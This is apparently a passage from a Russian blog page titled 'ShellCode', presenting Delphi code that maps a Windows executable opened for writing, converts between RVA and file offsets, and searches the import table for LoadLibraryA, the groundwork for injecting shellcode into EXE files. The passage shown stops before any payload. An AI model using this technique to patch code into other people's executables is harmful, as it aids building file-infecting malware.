// вы читаете...

Новости

ShellCode



UnMapViewOfFile(Base);
CloseHandle(hFM);
exit;
end;
Result:=RVA-ISH.VirtualAddress+ISH.PointerToRawData;
UnMapViewOfFile(Base);
CloseHandle(hFM);
end;

function Offset2RVA(hFile: THANDLE;Offset: Cardinal): Cardinal;
var
Base: Pointer;
ISH : PIMAGESECTIONHEADER;
INH : PIMAGENTHEADERS;
hFM : THANDLE;
x : Integer;
begin
Result:=0;
hFM:=CreateFileMapping(hFile,nil,PAGE_READONLY,0,0,nil);
Base:=MapViewOfFile(hFM,FILE_MAP_READ,0,0,0);
if Base=nil then
begin
UnMapViewOfFile(Base);
CloseHandle(hFM);
exit;
end;
INH:=ImageNTHeader(Base);
if INH=nil then
begin
UnMapViewOfFile(Base);
CloseHandle(hFM);
exit;
end;
ISH:=PIMAGESECTIONHEADER(DWORD(INH)+sizeof(IMAGE_NT_HEADERS));
for x:=0 to INH.FileHeader.NumberOfSections do
begin
if (Offset>=ISH.PointerToRawData) and (Offset<=ISH.PointerToRawData+ISH.SizeOfRawData) then break;
inc(ISH);
end;
Result:=Offset+ISH.VirtualAddress-ISH.PointerToRawData;
UnMapViewOfFile(Base);
CloseHandle(hFM);
end;

begin
Writeln(‘Enter Exe-File name’);
Readln(s);
h:=Createfile(s,GENERIC_READ or GENERIC_WRITE, 0,nil,OPEN_EXISTING,0,0);
if h=-1 then begin
Writeln(‘Wrong handle’);
Readln;
exit;
end;
ReadFile(h,_,sizeof(_),__,nil);
SetFilePointer(h,_._lfanew,0,FILE_BEGIN);
ReadFile(h,IOH,sizeof(IOH),__,nil);
SavedRVA:=Rva2offset(h,ioh.OptionalHeader.AddressOfEntryPoint);
if ioh.Signature<>$00004550 then
begin
writeln(‘Wrong magic’);
readln;
CloseHandle(h);
exit;
end;
__:=rva2offset(h,ioh.OptionalHeader.DataDirectory[1].VirtualAddress);
_._lfanew:=SetFilePointer(h,__,0,FILE_BEGIN);
iid.FirstThunk:=1; // лезем в чанки искать LoadLibrayA
while (s<>’LoadLibraryA’)and(iid.FirstThunk<>0) do begin
ReadFile(h,IID,sizeof(IID),__,nil);
inc(_._lfanew,__);
__:=rva2offset(h,IID.Name);
SetFilePointer(h,__,0,FILE_BEGIN);
Readfile(h,s,12,__,nil);
if (s=’kernel32.dll’)or(s=’KERNEL32.dll’) then begin // Borland и Microsoft пишут kernel32 каждый по своему
hel:=rva2offset(h,IID.FirstThunk);
repeat
SetFilePointer(h,hel,0,FILE_BEGIN);
Readfile(h,LLA,4,__,nil);
inc(hel,__);
__:=rva2offset(h,LLA)+2;
SetFilePointer(h,__,0,FILE_BEGIN);

Страницы: 1 2 3 4

Обсуждене

Отзывов нет на «ShellCode»

Ваш отзыв

Рубрики